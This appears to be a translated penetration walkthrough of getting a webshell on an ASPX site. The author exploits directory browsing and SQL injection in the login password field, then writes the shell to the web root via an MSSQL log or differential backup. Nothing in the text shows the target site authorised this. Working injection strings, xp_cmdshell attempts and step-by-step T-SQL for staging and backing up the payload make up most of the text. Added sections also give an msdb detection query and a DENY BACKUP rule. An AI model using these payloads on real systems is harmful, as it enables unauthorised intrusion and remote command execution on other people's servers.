Getting a shell via differential backup: a walkthrough

Source: Internet
Author: User

0x00 Preface

A scanner flagged directory browsing on a website, and that is how this article came about ...

Background:

1. Directory browsing

In my personal view, directory browsing is a significant vulnerability. The vulnerability is that, when a directory has no default document, the server lists all the file names and files in that directory. If a site has this misconfiguration and an attacker knows the directory name, they can view the files under it.

2. Prerequisites for the differential-backup technique
  1. The absolute path of the site on disk
  2. Write permission on that path (the backup file is written by the SQL Server service process, so it is the service account's permission that matters, not the SQL login's)
  3. Sufficient permissions on the current database to run BACKUP (by default sysadmin, db_owner or db_backupoperator; in this case the login is dbo)
0x01 Main body

The site was misconfigured and allowed directory browsing; reading the source of the home page turned up several directories.

Opening one of them at random produced an error page, which shows that the webmaster had not suppressed error messages.

That in itself is an information leak.

But the files in these directories usually need parameters to do anything, and without knowing the parameter names there was no way to use them.

Back to the front-end login page.

Testing found SQL injection in the password field, and the weak account admin existed, so it was possible to log in with a universal password.

I originally wanted to find a file upload point and get a shell directly, but there was none. What I did find was that the site used KindEditor, and the site's absolute path.

Since there is injection at the front-end login, the back end usually has many injection points as well. Look for one; if there is one, combined with the absolute path it can be used to get a shell.

OK, an injection point was found, but so far the database type is unknown. ASPX sites generally run on MSSQL, and since error messages were shown earlier, try MSSQL error-based injection:

%' and 1=@@version --a

It is MSSQL. Check the current user:

%' and 1=user --a

The user is dbo, not sa. Try xp_cmdshell:

%';exec('master..xp_cmdshell whoami') --a

xp_cmdshell is not enabled, and dbo does not have the permission to enable it (turning it on with sp_configure needs the server-level ALTER SETTINGS permission, i.e. sysadmin or serveradmin), so the only option left is to write a webshell with a differential backup.

1. Get the current database name
%' and 1=db_name() --a

2. Back up the current database

If the backup succeeds, the page returns the query result for %' itself (the statements are stacked, and the results of the following statements are not returned to the page).

3. Create a table and write to Webshell
%';create table cmd(a image) --a
%';insert into cmd(a) values (0xxxxx) --a  // hex value of the webshell

Tools from the Internet can do the hex conversion; I used a small tool I wrote myself.

4. Make a second backup
%';backup log <database name> to disk = '<absolute path>\abc.aspx'--

Here I wrote the webshell into a browsable subdirectory, because with directory browsing I can see exactly whether the file was generated.

After the file was created successfully, try connecting to it.
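The four steps above, as an added example that is not from the original post: the T-SQL the server actually executes once the stacked-query payloads reach it, with the difference between the log backup the post uses and a true differential backup (which the title refers to) made explicit. The database name webdb, the web path C:\inetpub\wwwroot\upload\ and the scratch path C:\Windows\Temp\ are assumptions, not values from the article.

```sql
-- Added example, not from the original post. Assumed names (not from the article):
-- database webdb, browsable web directory C:\inetpub\wwwroot\upload\, scratch path
-- C:\Windows\Temp\. The SQL Server *service account*, not the SQL login, must be
-- able to write to these paths.

-- 0. Which kind of second backup is possible? BACKUP LOG (what the post uses) is
--    refused under the SIMPLE recovery model; BACKUP ... WITH DIFFERENTIAL works
--    under any recovery model.
SELECT name, recovery_model_desc
FROM sys.databases
WHERE name = 'webdb';

-- 1. Current database name and user (the post gets these via error-based
--    injection: 1=db_name() and 1=user).
SELECT DB_NAME() AS current_db, USER_NAME() AS current_user_name;

-- 2. Base (full) backup. A log or differential backup is only allowed after one
--    of these exists. This file can be large: it is a copy of the whole database.
BACKUP DATABASE webdb TO DISK = 'C:\Windows\Temp\webdb_base.bak';

-- 3. Stage the payload in a new table so that it is the only change since step 2.
--    The post inserts a pre-computed hex literal (0x3C25...); CONVERT to varbinary
--    produces the same bytes without an external tool. The marker below is a
--    harmless placeholder, not a webshell.
CREATE TABLE cmd (a image);
INSERT INTO cmd (a)
VALUES (CONVERT(varbinary(max), '<%-- differential-backup marker --%>'));

-- 4a. Second backup as a log backup, as in the post (FULL/BULK_LOGGED only).
BACKUP LOG webdb TO DISK = 'C:\inetpub\wwwroot\upload\abc.aspx';

-- 4b. The same step as a differential backup, which also works under SIMPLE
--     recovery. FORMAT overwrites any existing media header instead of appending.
-- BACKUP DATABASE webdb TO DISK = 'C:\inetpub\wwwroot\upload\abc.aspx'
--     WITH DIFFERENTIAL, FORMAT;

-- Either way the file is mostly binary backup structure with the inserted bytes
-- embedded in it. In practice ASP.NET treats the surrounding bytes as literal text
-- and still compiles the <% ... %> block, which is why the file need not be valid text.
DROP TABLE cmd;
```

Because only the rows changed since the base backup end up in the second file, that file is small and the payload sits inside it almost unmodified; the large file is the base backup from step 2, which is why the follow-up below warns about database size.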

0x02 Follow-up
    1. If xp_cmdshell can be used directly, prefer it over differential backup: the backup writes a file to disk, and if the database is large, the full backup is large too and the operation affects the server.
    2. If there are any mistakes, please point them out.
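The defender's side of the follow-up, as an added example that is not from the original post: SQL Server records every BACKUP in msdb together with the file it was written to, so a backup whose target carries a web-served extension or sits under a web root is a direct trace of this technique. The login name webuser and the path fragment wwwroot are assumptions.

```sql
-- Added example, not from the original post: spotting and closing the
-- backup-to-webshell path. Assumed: the web root path contains 'wwwroot' and the
-- web application connects as the login/user 'webuser'.

-- Detection: backups written somewhere a backup has no business being.
-- msdb.dbo.backupset holds one row per BACKUP statement (who, when, what type);
-- msdb.dbo.backupmediafamily holds the physical file it went to.
SELECT bs.database_name,
       bs.backup_start_date,
       bs.user_name,                        -- login that issued the BACKUP
       CASE bs.type WHEN 'D' THEN 'full'
                    WHEN 'I' THEN 'differential'
                    WHEN 'L' THEN 'log'
                    ELSE bs.type END        AS backup_type,
       bs.backup_size,                      -- bytes; the second backup is tiny
       bmf.physical_device_name
FROM msdb.dbo.backupset         AS bs
JOIN msdb.dbo.backupmediafamily AS bmf ON bmf.media_set_id = bs.media_set_id
WHERE bmf.physical_device_name LIKE '%.asp%'
   OR bmf.physical_device_name LIKE '%.php'
   OR bmf.physical_device_name LIKE '%.jsp%'
   OR bmf.physical_device_name LIKE '%wwwroot%'
ORDER BY bs.backup_start_date DESC;

-- Prevention: the web login should not be able to run BACKUP at all.
-- This has no effect if the web login is the database owner (dbo, as in the post):
-- dbo is not subject to DENY, so the real fix is a low-privilege login for the site.
DENY BACKUP DATABASE, BACKUP LOG TO webuser;
```

The history rows in msdb survive deletion of the backup file itself, so the query is worth running during incident response even after the .aspx has been cleaned up.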
